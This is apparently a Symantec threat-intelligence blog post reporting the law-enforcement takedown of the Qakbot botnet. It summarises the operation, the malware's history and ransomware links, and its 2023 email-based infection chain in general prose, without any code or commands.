Qakbot: Takedown Operation Dismantles Botnet Infrastructure

A major international law enforcement operation has disrupted the notorious Qakbot botnet and taken much of its infrastructure offline. Led by the U.S. Federal Bureau of Investigation (FBI) and Justice Department and involving agencies from France, Germany, the Netherlands, the UK, Romania, and Latvia, the operation has resulted in the deletion of the Qakbot malware from more than 700,000 victim’s computers and the seizure of $8.6 million in cryptocurrency that is suspected to be the profit of cybercrime. 

The takedown operation saw the FBI obtaining access to Qakbot infrastructure, which allowed it to identify more than 700,000 infections and redirect the botnet’s traffic to servers controlled by the agency. An uninstaller was then distributed that removed the infected computers from the botnet.

Background

Qakbot is operated by a cybercrime group Symantec, part of Broadcom, calls Batbug. The malware is one of the most enduring threats, having first appeared in 2007. Like several similar malware families, Qakbot started life as a banking Trojan and, aside from its prevalence, it became known for its functionality and adaptability. For example, once it infected one machine in an organization, it was able to spread laterally across networks utilizing a worm-like functionality through brute-forcing network shares and Active Directory user group accounts, or via server message block (SMB) exploitation. 

Qakbot is largely spread via email. While it was once delivered by the Emotet botnet, Qakbot is now usually delivered directly via email spam runs, suggesting its operators acquired access to spamming infrastructure following Emotet’s disappearance. These emails may include a malicious link or attachment, and the subject lines generally refer to popular lure subjects such as shipping updates, work orders, urgent requests, invoices, and claims.

Recent Activity

In recent years, Qakbot has become closely associated with ransomware activity with Qakbot infections acting as the initial breach that ultimately leads to ransomware deployment on an organization’s network. Qakbot has been associated with multiple ransomware operations in recent years, including Sodinokibi, Egregor, ProLock, and MountLocker. Most recently, it has been seen collaborating with the BlackBasta ransomware operation. 

Activity by Qakbot stepped up significantly from January 2023, when its malicious emails leveraged Microsoft OneNote attachments to drop Qakbot on infected machines. OneNote is a desktop digital notebook application that is installed by default in all Microsoft Office/365 installations. Even if a Windows user does not typically use the application, it is still available to open the file format. 

The malicious emails contained an embedded URL. When clicked, it leads to a ZIP archive that contains a malicious OneNote file. Clicking on this file leads to the execution of an HTML Application (HTA) file that ultimately leads to a Qakbot DLL being downloaded onto a victim’s machine. It is downloaded as a .png file via curl before being loaded by rundll32.exe. 

There were indications in at least one Qakbot attack observed by Symantec that the initial access vector may have been malvertising. The attack chain in that instance began with the victim visiting a malicious website on the Chrome browser. This coincided with reports about malware, including IcedID, being spread via ads on Google. 

This surge in Qakbot activity appeared to last until June 2023. The attackers made frequent tweaks to their attack chain, likely in a bid to evade detection. OneNote files were eventually abandoned and by June the attackers were largely favoring PDF documents, which led to URLs from which malicious ZIP archives containing JavaScript downloaders were downloaded. 

It is unclear yet whether Qakbot's sudden cessation of activity in June was linked to this takedown operation.

Significant blow

Batbug has long been one of the largest players in the cybercrime landscape, controlling a lucrative malware distribution network that was linked to multiple major ransomware gangs. This takedown is likely to disrupt Batbug’s operations and it is possible that the group may struggle to rebuild its infrastructure in its aftermath.

Protection/Mitigation

For the latest protection updates, please visit the Symantec Protection Bulletin.